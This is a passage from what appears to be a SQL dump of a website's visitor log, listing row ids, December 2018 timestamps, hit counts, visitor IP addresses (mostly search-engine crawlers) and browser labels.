,'54.36.148.228','other'),(352584,1544902013,1,1,0,0,'54.36.148.150','other'),(352585,1544902026,2,2,0,0,'46.229.168.129','other'),(352586,1544902208,1,1,0,0,'66.249.66.40','chrome'),(352587,1544902242,2,2,0,0,'66.249.66.152','chrome'),(352588,1544902276,1,1,0,0,'66.249.66.156','chrome'),(352589,1544902536,1,1,0,0,'54.36.148.29','other'),(352590,1544902940,2,2,0,0,'91.209.11.236','other'),(352591,1544903219,2,2,0,0,'178.154.244.11','other'),(352592,1544903373,1,1,0,0,'8.29.198.26','other'),(352593,1544903676,1,1,0,0,'54.36.148.82','other'),(352594,1544903681,1,1,0,0,'8.29.198.27','other'),(352595,1544903907,1,1,0,0,'66.249.66.156','chrome'),(352596,1544904084,1,1,0,0,'207.46.13.63','other'),(352597,1544904090,2,2,0,0,'5.45.207.19','other'),(352598,1544904132,2,2,0,0,'66.249.66.154','chrome'),(352599,1544904337,1,1,0,0,'40.77.167.90','other'),(352600,1544904357,2,2,0,0,'141.8.142.103','other'),(352601,1544905072,1,1,0,0,'157.55.39.94','other'),(352602,1544905079,1,1,0,0,'5.45.207.79','other'),(352603,1544905097,1,1,0,0,'66.249.66.156','chrome'),(352604,1544905098,3,3,0,0,'66.249.66.152','chrome'),(352605,1544905113,1,1,0,0,'193.194.124.239','chrome'),(352606,1544905115,1,1,0,0,'95.108.213.4','other'),(352607,1544905372,1,1,0,0,'66.249.66.44','chrome'),(352608,1544905391,1,1,0,0,'46.229.168.154','other'),(352609,1544905395,2,2,0,0,'66.249.66.40','chrome'),(352610,1544905541,1,1,0,0,'54.36.149.26','other'),(352611,1544905571,1,1,0,0,'46.229.168.133','other'),(352612,1544905855,1,1,0,0,'54.36.148.50','other'),(352613,1544905939,1,1,0,0,'66.249.66.154','chrome'),(352614,1544906392,1,1,0,0,'40.77.167.88','other'),(352615,1544906393,1,1,0,0,'54.36.149.96','other'),(352616,1544906546,2,2,0,0,'66.249.66.156','chrome'),(352617,1544906588,1,1,0,0,'54.36.148.25','other'),(352618,1544906709,1,1,0,0,'54.36.148.59','other'),(352619,1544907120,2,2,0,0,'66.249.66.152','chrome'),(352620,1544907149,1,1,0,0,'66.249.66.154','chrome'),(352621,1544907153,1,1,0,0,'66.249.66.155','chrome'),(352622,1544907270,1,1,0,0,'95.163.255.102','other'),(352623,1544907302,1,1,0,0,'95.163.255.118','other'),(352624,1544907320,1,1,0,0,'95.163.255.108','other'),(352625,1544907335,1,1,0,0,'95.163.255.113','other'),(352626,1544907361,1,1,0,0,'95.163.255.119','other'),(352627,1544907396,1,1,0,0,'91.196.178.44','chrome'),(352628,1544907516,1,1,0,0,'95.163.255.109','other'),(352629,1544907742,1,1,0,0,'54.36.148.133','other'),(352630,1544907792,1,1,0,0,'66.249.66.42','chrome'),(352631,1544908134,1,1,0,0,'54.36.149.81','other'),(352632,1544908205,1,1,0,0,'95.163.255.99','other'),(352633,1544908207,1,1,0,0,'95.163.255.97','other'),(352634,1544908707,2,2,0,0,'66.249.66.156','chrome'),(352635,1544908772,1,1,0,0,'66.249.66.154','chrome'),(352636,1544908902,1,1,0,0,'66.249.66.42','chrome'),(352637,1544908921,1,1,0,0,'66.249.66.44','chrome'),(352638,1544908970,1,1,0,0,'54.36.148.93','other'),(352639,1544909423,1,1,0,0,'54.36.148.107','other'),(352640,1544909500,1,1,0,0,'54.36.148.180','other'),(352641,1544909607,1,1,0,0,'54.36.149.21','other'),(352642,1544909713,1,1,0,0,'66.249.66.157','chrome'),(352643,1544909715,1,1,0,0,'66.249.66.152','chrome'),(352644,1544909758,1,1,0,0,'54.36.149.80','other'),(352645,1544909760,1,1,0,0,'54.36.148.143','other'),(352646,1544910242,1,1,0,0,'54.36.148.176','other'),(352647,1544910375,1,1,0,0,'46.229.168.134','other'),(352648,1544910472,1,1,0,0,'178.154.244.11','other'),(352649,1544910559,1,1,0,0,'207.46.13.61','other'),(352650,1544910727,1,1,0,0,'66.249.66.154','chrome'),(352651,1544911353,1,1,0,0,'54.36.148.123','other'),(352652,1544911475,1,1,0,0,'54.36.149.10','other'),(352653,1544911830,1,1,0,0,'54.36.149.95','other'),(352654,1544912158,1,1,0,0,'54.36.149.11','other'),(352655,1544912174,1,1,0,0,'157.55.39.97','other'),(352656,1544912359,1,1,0,0,'54.36.148.52','other'),(352657,1544912371,2,2,0,0,'66.249.66.40','chrome'),(352658,1544912377,2,2,0,0,'66.249.66.156','chrome'),(352659,1544912617,6,6,0,0,'5.45.207.79','other'),(352660,1544912661,2,2,0,0,'157.55.39.94','other'),(352661,1544912757,1,1,0,0,'194.50.51.249','firefox'),(352662,1544912788,4,4,0,0,'5.45.207.19','other'),(352663,1544912813,3,3,0,0,'178.154.244.11','other'),(352664,1544912816,1,1,0,0,'54.36.149.98','other'),(352665,1544912929,1,1,0,0,'31.184.238.56','chrome'),(352666,1544913125,1,1,0,0,'54.36.148.146','other'),(352667,1544913298,2,2,0,0,'141.8.142.103','other'),(352668,1544913660,2,2,0,0,'5.45.207.79','other'),(352669,1544913698,1,1,0,0,'46.229.168.149','other'),(352670,1544914160,2,2,0,0,'178.154.244.11','other'),(352671,1544914205,1,1,0,0,'8.29.198.25','other'),(352672,1544914250,2,2,0,0,'66.249.66.155','chrome'),(352673,1544914268,1,1,0,0,'66.249.66.154','chrome'),(352674,1544914269,2,2,0,0,'66.249.66.152','chrome'),(352675,1544914323,1,1,0,0,'54.36.149.82','other'),(352676,1544914326,1,1,0,0,'141.8.142.103','other'),(352677,1544914450,1,1,0,0,'66.249.66.156','chrome'),(352678,1544914519,1,1,0,0,'54.36.148.201','other'),(352679,1544914524,1,1,0,0,'8.29.198.26','other'),(352680,1544915329,2,2,0,0,'5.45.207.79','other'),(352681,1544915602,2,2,0,0,'40.77.167.88','other'),(352682,1544915627,1,1,0,0,'54.36.148.163','other'),(352683,1544915719,1,1,0,0,'157.55.39.94','other'),(352684,1544916069,1,1,0,0,'157.55.39.167','other'),(352685,1544916091,1,1,0,0,'54.36.148.19','other'),(352686,1544916234,3,3,0,0,'66.249.66.156','chrome'),(352687,1544916462,1,1,0,0,'157.55.39.53','other'),(352688,1544916470,1,1,0,0,'66.249.66.154','chrome'),(352689,1544916630,1,1,0,0,'87.250.224.47','other'),(352690,1544916653,1,1,0,0,'66.249.66.152','chrome'),(352691,1544916770,1,1,0,0,'54.36.148.151','other'),(352692,1544916910,1,1,0,0,'207.46.13.86','other'),(352693,1544917166,1,1,0,0,'54.36.149.84','other'),(352694,1544917384,1,1,0,0,'66.249.66.57','chrome'),(352696,1544917559,1,1,0,0,'66.249.66.156','chrome'),(352697,1544917797,1,1,0,0,'46.229.168.147','other'),(352698,1544917849,1,1,0,0,'66.249.66.42','chrome'),(352699,1544917890,1,1,0,0,'157.55.39.94','other'),(352700,1544918075,1,1,0,0,'66.249.66.44','chrome'),(352701,1544918112,1,1,0,0,'66.249.66.154','chrome'),(352702,1544918154,3,3,0,0,'157.55.39.53','other'),(352703,1544918176,1,1,0,0,'5.45.207.19','other'),(352704,1544918316,1,1,0,0,'54.36.148.237','other'),(352705,1544918410,1,1,0,0,'54.36.148.231','other'),(352706,1544918517,2,2,0,0,'178.154.244.11','other'),(352707,1544918566,1,1,0,0,'66.249.66.152','chrome'),(352708,1544918738,1,1,0,0,'54.36.148.155','other'),(352709,1544919072,1,1,0,0,'46.229.168.137','other'),(352710,1544919074,1,1,0,0,'46.229.168.132','other'),(352711,1544919125,2,2,0,0,'66.249.66.156','chrome'),(352712,1544919126,1,1,0,0,'66.249.66.154','chrome'),(352713,1544919413,2,2,0,0,'91.242.162.53','other'),(352714,1544919503,1,1,0,0,'54.36.149.76','other'),(352715,1544919542,1,1,0,0,'54.36.148.12','other'),(352716,1544919777,1,1,0,0,'54.36.148.74','other'),(352717,1544919937,1,1,0,0,'54.36.148.194','other'),(352718,1544920004,1,1,0,0,'66.249.66.157','chrome'),(352719,1544920549,1,1,0,0,'46.229.168.140','other'),(352720,1544920551,1,1,0,0,'46.229.168.148','other'),(352721,1544920643,1,1,0,0,'207.46.13.180','other'),(352722,1544920727,1,1,0,0,'95.108.181.54','other'),(352723,1544920817,2,2,0,0,'66.249.66.156','chrome'),(352724,1544921407,1,1,0,0,'66.249.66.44','chrome'),(352725,1544921866,1,1,0,0,'46.165.254.166','other'),(352726,1544921963,4,4,0,0,'5.45.207.19','other'),(352727,1544922041,1,1,0,0,'66.249.66.42','chrome'),(352728,1544922074,1,1,0,0,'54.36.148.108','other'),(352729,1544922139,3,3,0,0,'5.45.207.79','other'),(352730,1544922147,1,1,0,0,'37.112.23.18','chrome'),(352731,1544922211,3,3,0,0,'141.8.142.103','other'),(352732,1544922238,2,2,0,0,'157.55.39.174','other'),(352733,1544922249,1,1,0,0,'46.229.168.140','other'),(352734,1544922301,1,1,0,0,'54.36.149.74','other'),(352735,1544922749,6,6,0,0,'178.154.244.11','other'),(352736,1544923076,1,1,0,0,'157.55.39.53','other'),(352737,1544923085,1,1,0,0,'46.229.168.150','other'),(352738,1544923175,1,1,0,0,'5.45.207.19','other'),(352739,1544923191,4,4,0,0,'5.45.207.79','other'),(352740,1544923323,1,1,0,0,'66.249.66.44','chrome'),(352741,1544923332,1,1,0,0,'54.36.148.150','other'),(352742,1544923403,1,1,0,0,'54.36.148.200','other'),(352743,1544923421,1,1,0,0,'54.36.148.213','other'),(352744,1544924130,1,1,0,0,'82.145.208.142','other'),(352745,1544924246,1,1,0,0,'95.108.213.4','other'),(352746,1544924257,2,2,0,0,'178.154.244.11','other'),(352747,1544924347,1,1,0,0,'5.45.207.79','other'),(352748,1544924592,1,1,0,0,'54.36.148.201','other'),(352749,1544924850,1,1,0,0,'54.36.148.242','other'),(352750,1544925042,1,1,0,0,'8.29.198.25','other'),(352751,1544925076,1,1,0,0,'207.46.13.15','other'),(352752,1544925306,1,1,0,0,'178.154.244.11','other'),(352753,1544925342,1,1,0,0,'40.77.167.89','other'),(352754,1544925372,1,1,0,0,'8.29.198.26','other'),(352755,1544925518,1,1,0,0,'54.36.148.79','other'),(352756,1544925547,10,10,0,0,'207.46.13.134','other'),(352757,1544925569,1,1,0,0,'54.36.149.21','other'),(352758,1544926167,1,1,0,0,'23.101.169.3','msie'),(352759,1544926220,1,1,0,0,'180.76.15.149','other'),(352760,1544926221,1,1,0,0,'180.76.15.156','other'),(352761,1544926225,1,1,0,0,'178.154.244.11','other'),(352762,1544926489,1,1,0,0,'54.36.149.78','other'),(352763,1544926550,1,1,0,0,'46.229.168.148','other'),(352764,1544926815,1,1,0,0,'66.249.66.42','chrome'),(352765,1544926917,2,2,0,0,'66.249.66.156','chrome'),(352766,1544927078,1,1,0,0,'66.249.66.155','chrome'),(352767,1544927202,2,2,0,0,'40.77.167.89','other'),(352768,1544927464,1,1,0,0,'87.250.224.47','other'),(352769,1544927955,1,1,0,0,'5.45.207.79','other'),(352770,1544928129,1,1,0,0,'54.36.148.56','other'),(352771,1544928182,3,3,0,0,'66.249.66.152','chrome'),(352772,1544928541,6,6,0,0,'40.77.167.170','other'),(352773,1544928564,1,1,0,0,'66.249.66.156','chrome'),(352774,1544928703,1,1,0,0,'66.249.66.40','chrome'),(352775,1544928777,2,2,0,0,'66.249.66.154','chrome'),(352776,1544928940,2,2,0,0,'40.77.167.89','other'),(352777,1544929193,2,2,0,0,'91.209.11.236','other'),(352778,1544929245,1,1,0,0,'54.36.148.69','other'),(352779,1544929508,1,1,0,0,'141.8.142.103','other'),(352780,1544929565,1,1,0,0,'46.229.168.150','other'),(352781,1544929723,1,1,0,0,'54.36.149.20','other'),(352782,1544929787,1,1,0,0,'95.163.255.116','other'),(352783,1544929828,1,1,0,0,'66.249.66.154','chrome'),(352784,1544929830,1,1,0,0,'178.154.244.11','other'),(352785,1544929926,2,2,0,0,'95.163.255.104','other'),(352786,1544930271,1,1,0,0,'95.163.255.106','other'),(352787,1544930352,1,1,0,0,'66.249.66.157','chrome'),(352788,1544930357,1,1,0,0,'66.249.66.152','chrome'),(352789,1544930383,151,151,0,0,'207.180.219.145','other'),(352790,1544930412,1,1,0,0,'54.36.148.74','other'),(352791,1544930428,1,1,0,0,'95.163.255.108','other'),(352792,1544930438,1,1,0,0,'95.163.255.184','other'),(352793,1544930572,1,1,0,0,'95.163.255.107','other'),(352794,1544930835,1,1,0,0,'46.229.168.137','other'),(352795,1544930870,1,1,0,0,'5.45.207.79','other'),(352796,1544931082,1,1,0,0,'54.36.148.251','other'),(352797,1544931208,3,3,0,0,'66.249.66.156','chrome'),(352798,1544931217,1,1,0,0,'54.36.149.34','other'),(352799,1544931263,3,3,0,0,'178.154.244.11','other'),(352800,1544931288,130,130,0,0,'207.180.219.145','other'),(352801,1544931319,1,1,0,0,'46.229.168.152','other'),(352802,1544931512,3,3,0,0,'5.45.207.19','other'),(352803,1544931900,1,1,0,0,'46.229.168.140','other'),(352804,1544931901,1,1,0,0,'66.249.66.157','chrome'),(352805,1544932078,1,1,0,0,'46.166.137.211','other'),(352806,1544932178,1,1,0,0,'207.46.13.13','other'),(352807,1544932190,88,88,0,0,'207.180.219.145','other'),(352808,1544932209,1,1,0,0,'54.36.148.49','other'),(352809,1544932258,1,1,0,0,'66.249.66.152','chrome'),(352810,1544932272,1,1,0,0,'66.249.66.156','chrome'),(352811,1544932571,1,1,0,0,'54.36.148.81','other'),(352812,1544932729,1,1,0,0,'66.249.66.44','chrome'),(352813,1544933092,104,104,0,0,'207.180.219.145','other'),(352814,1544933106,2,2,0,0,'178.154.244.11','other'),(352815,1544933107,1,1,0,0,'5.45.207.19','other'),(352816,1544933131,2,2,0,0,'46.133.119.156','chrome'),(352817,1544933357,1,1,0,0,'46.229.168.141','other'),(352818,1544933535,1,1,0,0,'54.36.148.190','other'),(352819,1544934365,1,1,0,0,'23.101.169.3','msie'),(352820,1544934384,1,1,0,0,'89.248.174.153','other'),(352821,1544934603,1,1,0,0,'66.249.66.40','chrome'),(352822,1544934611,1,1,0,0,'66.249.66.157','chrome'),(352823,1544934629,2,2,0,0,'66.249.66.154','chrome'),(352824,1544934723,1,1,0,0,'54.36.148.38','other'),(352825,1544934785,1,1,0,0,'54.36.148.160','other'),(352826,1544935217,1,1,0,0,'54.36.148.50','other'),(352827,1544935267,1,1,0,0,'54.36.149.39','other'),(352828,1544935451,1,1,0,0,'54.36.149.58','other'),(352829,1544935493,1,1,0,0,'54.36.148.25','other'),(352830,1544935628,1,1,0,0,'66.249.66.152','chrome'),(352831,1544935826,1,1,0,0,'54.36.148.220','other'),(352832,1544935877,2,2,0,0,'8.29.198.26','other'),(352833,1544935961,1,1,0,0,'54.36.149.21','other'),(352834,1544936169,1,1,0,0,'66.249.66.154','chrome'),(352835,1544936284,2,2,0,0,'91.196.178.133','firefox'),(352836,1544936303,1,1,0,0,'66.249.66.42','chrome'),(352837,1544936812,1,1,0,0,'54.36.148.107','other'),(352838,1544937120,2,2,0,0,'66.249.66.57','chrome'),(352839,1544937124,1,1,0,0,'66.249.66.40','chrome'),(352840,1544937248,4,4,0,0,'40.77.167.170','other'),(352841,1544937332,1,1,0,0,'54.36.149.91','other'),(352842,1544937356,1,1,0,0,'66.249.66.42','chrome'),(352843,1544937501,1,1,0,0,'66.249.66.154','chrome'),(352844,1544938043,1,1,0,0,'40.77.167.89','other'),(352845,1544938185,1,1,0,0,'66.249.66.156','chrome'),(352846,1544938662,1,1,0,0,'54.36.148.50','other'),(352847,1544938673,1,1,0,0,'46.229.168.148','other'),(352848,1544938775,1,1,0,0,'23.101.169.3','msie'),(352849,1544938800,1,1,0,0,'54.36.148.157','other'),(352850,1544939254,3,3,0,0,'66.249.66.42','chrome'),(352851,1544939391,1,1,0,0,'95.163.255.168','other'),(352852,1544939709,28,28,0,0,'144.76.176.171','other'),(352853,1544939754,3,3,0,0,'66.249.66.154','chrome'),(352854,1544939958,1,1,0,0,'66.249.66.40','chrome'),(352855,1544940136,1,1,0,0,'66.249.66.157','chrome'),(352856,1544940137,1,1,0,0,'66.249.66.152','chrome'),(352857,1544940207,1,1,0,0,'54.36.148.135','other'),(352858,1544940385,1,1,0,0,'54.36.148.122','other'),(352859,1544940499,1,1,0,0,'157.55.39.71','other'),(352860,1544941107,1,1,0,0,'66.249.66.42','chrome'),(352861,1544941130,1,1,0,0,'23.101.169.3','msie'),(352862,1544941230,1,1,0,0,'66.249.66.40','chrome'),(352863,1544941292,1,1,0,0,'66.249.66.156','chrome'),(352864,1544941308,1,1,0,0,'54.36.148.63','other'),(352865,1544941552,1,1,0,0,'54.36.148.61','other'),(352866,1544941605,2,2,0,0,'40.77.167.89','other'),(352867,1544941716,1,1,0,0,'5.45.207.19','other'),(352868,1544941717,1,1,0,0,'66.249.66.152','chrome'),(352869,1544942409,1,1,0,0,'95.163.255.179','other'),(352870,1544942687,1,1,0,0,'95.163.255.159','other'),(352871,1544942688,1,1,0,0,'95.163.255.163','other'),(352872,1544942864,1,1,0,0,'178.154.244.11','other'),(352873,1544942926,1,1,0,0,'66.249.66.44','chrome'),(352874,1544942974,1,1,0,0,'40.77.167.89','other'),(352875,1544942999,1,1,0,0,'5.45.207.19','other'),(352876,1544943124,1,1,0,0,'54.36.149.18','other'),(352877,1544943496,1,1,0,0,'66.249.66.157','chrome'),(352878,1544943497,2,2,0,0,'66.249.66.154','chrome'),(352879,1544943750,1,1,0,0,'54.36.148.197','other'),(352880,1544943769,1,1,0,0,'180.76.15.162','other'),(352881,1544943770,1,1,0,0,'180.76.15.153','other'),(352882,1544943934,1,1,0,0,'54.36.149.43','other'),(352883,1544943940,4,4,0,0,'180.163.220.66','other'),(352884,1544943947,1,1,0,0,'180.163.220.4','other'),(352885,1544943970,1,1,0,0,'180.163.220.5','other'),(352886,1544943972,1,1,0,0,'42.236.10.106','other'),(352887,1544943973,1,1,0,0,'42.236.10.124','other'),(352888,1544943994,1,1,0,0,'54.36.148.77','other'),(352889,1544944247,1,1,0,0,'95.163.255.92','other'),(352890,1544944647,1,1,0,0,'54.36.148.46','other'),(352891,1544944689,1,1,0,0,'46.211.148.58','chrome'),(352892,1544944695,1,1,0,0,'95.163.255.117','other'),(352893,1544944707,1,1,0,0,'95.163.255.104','other'),(352894,1544944864,1,1,0,0,'46.229.168.144','other'),(352895,1544944866,1,1,0,0,'46.229.168.146','other'),(352896,1544944919,1,1,0,0,'207.46.13.242','other'),(352897,1544945118,1,1,0,0,'95.163.255.183','other'),(352898,1544945221,1,1,0,0,'40.77.167.222','other'),(352899,1544945831,1,1,0,0,'157.55.39.219','other'),(352900,1544945864,2,2,0,0,'46.211.111.9','chrome'),(352901,1544945974,2,2,0,0,'66.249.66.44','chrome'),(352902,1544946562,1,1,0,0,'54.36.148.112','other'),(352903,1544946716,1,1,0,0,'8.29.198.27','other'),(352904,1544946722,1,1,0,0,'66.249.66.40','chrome'),(352905,1544946848,1,1,0,0,'207.46.13.15','other'),(352906,1544946851,2,2,0,0,'66.249.66.154','chrome'),(352907,1544946870,1,1,0,0,'54.36.148.145','other'),(352908,1544946945,1,1,0,0,'54.36.149.74','other'),(352909,1544947053,1,1,0,0,'8.29.198.26','other'),(352910,1544947239,1,1,0,0,'54.36.148.211','other'),(352911,1544947313,1,1,0,0,'54.36.148.196','other'),(352912,1544947328,1,1,0,0,'54.36.149.19','other'),(352913,1544947772,1,1,0,0,'95.163.255.186','other'),(352914,1544947775,1,1,0,0,'95.163.255.161','other'),(352915,1544947776,1,1,0,0,'46.211.49.132','chrome'),(352916,1544947921,1,1,0,0,'207.46.13.12','other'),(352917,1544948093,1,1,0,0,'46.229.168.141','other'),(352918,1544948114,1,1,0,0,'66.249.66.61','chrome'),(352919,1544948115,1,1,0,0,'66.249.66.42','chrome'),(352920,1544948332,3,3,0,0,'66.249.66.152','chrome'),(352921,1544948367,1,1,0,0,'171.13.14.25','other'),(352923,1544948369,1,1,0,0,'171.13.14.6','other'),(352924,1544948568,1,1,0,0,'40.77.167.221','other'),(352925,1544948708,2,2,0,0,'162.210.196.129','other'),(352926,1544949168,4,4,0,0,'66.249.66.156','chrome'),(352927,1544949385,1,1,0,0,'66.249.66.154','chrome'),(352928,1544949395,1,1,0,0,'46.229.168.145','other'),(352929,1544949396,1,1,0,0,'46.229.168.143','other'),(352930,1544949542,1,0,1,0,'66.249.66.57',''),(352931,1544949543,1,0,1,0,'66.249.66.40',''),(352932,1544949581,1,0,1,0,'66.249.66.42',''),(352933,1544949823,2,2,0,0,'91.209.11.236','other'),(352934,1544950047,1,1,0,0,'54.36.148.199','other'),(352935,1544950119,1,1,0,0,'54.36.148.95','other'),(352936,1544950133,1,1,0,0,'54.36.148.107','other'),(352937,1544950136,1,1,0,0,'46.229.168.132','other'),(352938,1544950139,1,1,0,0,'46.229.168.144','other'),(352939,1544950163,1,1,0,0,'46.166.137.213','other'),(352940,1544950177,1,1,0,0,'54.36.148.247','other'),(352941,1544950374,1,1,0,0,'46.229.168.146','other'),(352942,1544950376,1,1,0,0,'46.229.168.141','other'),(352943,1544951332,1,1,0,0,'54.36.149.32','other'),(352944,1544951516,1,1,0,0,'54.36.148.64','other'),(352945,1544951575,2,2,0,0,'66.249.66.152','chrome'),(352946,1544951829,1,1,0,0,'54.36.148.130','other'),(352947,1544951856,1,1,0,0,'54.36.148.86','other'),(352948,1544951861,1,1,0,0,'66.249.66.156','chrome'),(352949,1544952018,1,1,0,0,'54.36.149.76','other'),(352950,1544952437,1,1,0,0,'66.249.66.155','chrome'),(352951,1544953072,1,1,0,0,'66.249.66.156','chrome'),(352952,1544953193,1,1,0,0,'207.46.13.115','other'),(352953,1544953355,1,1,0,0,'46.229.168.132','other'),(352954,1544953371,1,1,0,0,'46.229.168.134','other'),(352955,1544953373,1,1,0,0,'46.229.168.152','other'),(352956,1544953396,1,1,0,0,'54.36.148.61','other'),(352957,1544953484,1,1,0,0,'95.163.255.99','other'),(352958,1544953644,1,1,0,0,'54.36.148.216','other'),(352959,1544953849,1,1,0,0,'46.229.168.129','other'),(352960,1544954111,1,1,0,0,'54.36.148.209','other'),(352961,1544954149,2,2,0,0,'5.45.207.8','other'),(352962,1544954160,1,1,0,0,'37.9.113.148','other'),(352963,1544954247,1,1,0,0,'91.242.162.41','other'),(352964,1544954317,1,1,0,0,'66.249.66.157','chrome'),(352965,1544954318,1,1,0,0,'66.249.66.156','chrome'),(352966,1544954358,1,1,0,0,'5.58.40.52','other'),(352967,1544954426,1,1,0,0,'54.36.148.181','other'),(352968,1544954484,1,1,0,0,'54.36.149.74','other'),(352969,1544954626,2,2,0,0,'178.154.244.11','other'),(352970,1544954696,1,1,0,0,'87.250.224.47','other'),(352971,1544954781,3,3,0,0,'130.180.219.4','chrome'),(352972,1544954988,1,1,0,0,'66.249.66.152','chrome'),(352973,1544955076,1,1,0,0,'54.36.149.0','other'),(352974,1544955139,1,1,0,0,'141.8.142.103','other'),(352975,1544955400,1,1,0,0,'54.36.149.88','other'),(352976,1544955645,1,1,0,0,'54.36.148.124','other'),(352977,1544955748,1,1,0,0,'54.36.148.96','other'),(352978,1544955805,1,1,0,0,'95.163.255.99','other'),(352979,1544956035,1,1,0,0,'66.249.66.154','chrome'),(352980,1544956053,2,2,0,0,'95.163.255.93','other'),(352981,1544956069,1,1,0,0,'95.163.255.92','other'),(352982,1544956345,1,1,0,0,'54.36.149.25','other'),(352983,1544956347,1,1,0,0,'54.36.148.27','other'),(352984,1544956352,1,1,0,0,'46.229.168.146','other'),(352985,1544956354,1,1,0,0,'46.229.168.150','other'),(352986,1544956466,1,1,0,0,'188.163.102.236','chrome'),(352987,1544956484,1,1,0,0,'46.229.168.151','other'),(352988,1544956715,1,1,0,0,'46.229.168.154','other'),(352989,1544957209,1,1,0,0,'54.36.148.156','other'),(352990,1544957271,1,1,0,0,'5.45.207.19','other'),(352991,1544957521,1,1,0,0,'5.45.207.79','other'),(352992,1544957554,1,1,0,0,'8.29.198.25','other'),(352993,1544957579,1,1,0,0,'46.229.168.133','other'),(352994,1544957594,1,1,0,0,'54.36.149.44','other'),(352995,1544957601,1,1,0,0,'66.249.66.42','chrome'),(352996,1544957903,1,1,0,0,'8.29.198.27','other'),(352997,1544958329,1,1,0,0,'54.36.149.94','other'),(352998,1544958656,1,1,0,0,'46.229.168.152','other'),(352999,1544958825,1,1,0,0,'54.36.149.39','other'),(353000,1544959280,1,1,0,0,'54.36.148.172','other'),(353001,1544959385,2,2,0,0,'141.8.142.103','other'),(353002,1544959628,1,1,0,0,'54.36.149.93','other'),(353003,1544959829,1,1,0,0,'54.36.148.88','other'),(353004,1544960144,1,1,0,0,'66.249.66.154','chrome'),(353005,1544960369,1,1,0,0,'46.229.168.134','other'),(353006,1544960800,1,1,0,0,'5.45.207.79','other'),(353007,1544960845,2,2,0,0,'66.249.66.40','chrome'),(353008,1544961098,1,1,0,0,'54.36.148.33','other'),(353009,1544961151,2,2,0,0,'66.249.66.152','chrome'),(353010,1544961197,1,1,0,0,'54.36.148.49','other'),(353011,1544961288,1,1,0,0,'66.249.66.42','chrome'),(353012,1544961328,1,1,0,0,'5.45.207.19','other'),(353013,1544961591,1,1,0,0,'66.249.66.156','chrome'),(353014,1544961737,1,1,0,0,'95.163.255.92','other'),(353015,1544961746,1,1,0,0,'54.36.148.153','other'),(353016,1544962210,1,1,0,0,'46.229.168.151','other'),(353017,1544962212,1,1,0,0,'46.229.168.138','other'),(353018,1544962352,1,1,0,0,'178.154.244.11','other'),(353019,1544962621,1,1,0,0,'66.249.66.156','chrome'),(353020,1544962622,2,2,0,0,'66.249.66.154','chrome'),(353021,1544962705,2,2,0,0,'66.249.66.152','chrome'),(353022,1544962709,1,1,0,0,'46.229.168.137','other'),(353023,1544963461,1,1,0,0,'66.249.66.155','chrome'),(353024,1544963626,1,1,0,0,'54.36.148.34','other'),(353025,1544964240,1,1,0,0,'54.36.148.141','other'),(353026,1544964383,1,1,0,0,'178.154.244.11','other'),(353027,1544964504,1,1,0,0,'46.229.168.153','other'),(353028,1544964575,1,1,0,0,'5.45.207.79','other'),(353029,1544964595,1,1,0,0,'54.36.148.12','other'),(353030,1544964753,1,1,0,0,'54.36.148.78','other'),(353031,1544964819,1,1,0,0,'46.133.250.140','chrome'),(353032,1544964933,1,1,0,0,'66.249.66.44','chrome'),(353033,1544964946,1,1,0,0,'54.36.148.175','other'),(353034,1544965462,5,5,0,0,'66.249.83.220','chrome'),(353035,1544965470,4,4,0,0,'66.249.83.218','chrome'),(353036,1544965471,2,2,0,0,'66.249.83.216','chrome'),(353037,1544965534,1,1,0,0,'91.196.178.168','chrome'),(353038,1544965574,1,1,0,0,'54.36.148.111','other'),(353039,1544965634,1,1,0,0,'66.249.66.156','chrome'),(353040,1544965841,1,1,0,0,'66.249.66.157','chrome'),(353041,1544965842,2,2,0,0,'66.249.66.152','chrome'),(353042,1544965981,1,1,0,0,'54.36.149.41','other'),(353043,1544966228,1,1,0,0,'207.46.13.210','other'),(353044,1544966362,1,1,0,0,'54.36.148.74','other'),(353045,1544966411,1,1,0,0,'40.77.167.142','other'),(353046,1544966447,2,2,0,0,'66.249.66.40','chrome'),(353047,1544966609,2,2,0,0,'66.249.66.154','chrome'),(353048,1544966669,2,2,0,0,'66.249.66.156','chrome'),(353049,1544966831,1,1,0,0,'5.45.207.19','other'),(353050,1544966838,1,1,0,0,'54.36.148.115','other'),(353051,1544966839,1,1,0,0,'207.46.13.79','other'),(353052,1544966866,1,1,0,0,'54.36.148.107','other'),(353053,1544966874,1,1,0,0,'66.249.83.44','chrome'),(353054,1544966879,1,1,0,0,'66.249.83.42','chrome'),(353055,1544967030,1,1,0,0,'66.249.66.44','chrome'),(353056,1544967141,2,2,0,0,'91.196.178.134','firefox'),(353057,1544967356,1,1,0,0,'46.229.168.153','other'),(353058,1544967384,1,1,0,0,'46.229.168.136','other'),(353059,1544967911,1,1,0,0,'54.165.59.7','other'),(353060,1544967939,1,1,0,0,'66.249.66.157','chrome'),(353061,1544967959,2,2,0,0,'66.249.66.154','chrome'),(353062,1544967978,1,1,0,0,'54.36.148.92','other'),(353063,1544968023,2,2,0,0,'66.249.66.156','chrome'),(353064,1544968039,2,2,0,0,'66.249.66.44','chrome'),(353065,1544968136,1,1,0,0,'46.229.168.146','other'),(353066,1544968351,2,2,0,0,'66.249.66.152','chrome'),(353067,1544968393,2,2,0,0,'8.29.198.26','other'),(353068,1544968806,1,1,0,0,'54.36.148.48','other'),(353069,1544968829,2,2,0,0,'54.165.59.7','other'),(353070,1544968890,2,2,0,0,'52.53.201.78','chrome'),(353071,1544969100,1,1,0,0,'66.249.66.155','chrome'),(353072,1544969113,2,2,0,0,'54.245.183.245','chrome'),(353073,1544969513,1,1,0,0,'66.249.66.154','chrome'),(353074,1544969569,1,1,0,0,'54.36.148.213','other'),(353075,1544969570,1,1,0,0,'66.249.66.61','chrome'),(353076,1544969571,2,2,0,0,'66.249.66.40','chrome'),(353077,1544969733,2,2,0,0,'54.165.59.7','other'),(353078,1544970001,1,1,0,0,'46.229.168.143','other'),(353079,1544970002,1,1,0,0,'46.229.168.139','other'),(353080,1544970045,2,2,0,0,'66.249.66.156','chrome'),(353081,1544970047,2,2,0,0,'66.249.66.152','chrome'),(353082,1544970310,1,1,0,0,'180.76.15.11','other'),(353083,1544970311,1,1,0,0,'180.76.15.16','other'),(353084,1544970367,1,1,0,0,'207.46.13.167','other'),(353085,1544970450,2,2,0,0,'46.229.168.148','other'),(353086,1544970552,1,1,0,0,'66.249.66.44','chrome'),(353087,1544970741,1,1,0,0,'66.249.66.157','chrome'),(353088,1544970975,1,1,0,0,'5.45.207.19','other'),(353089,1544971207,1,1,0,0,'54.36.148.86','other'),(353090,1544971340,2,2,0,0,'66.249.66.155','chrome'),(353091,1544971351,2,2,0,0,'66.249.66.154','chrome'),(353092,154497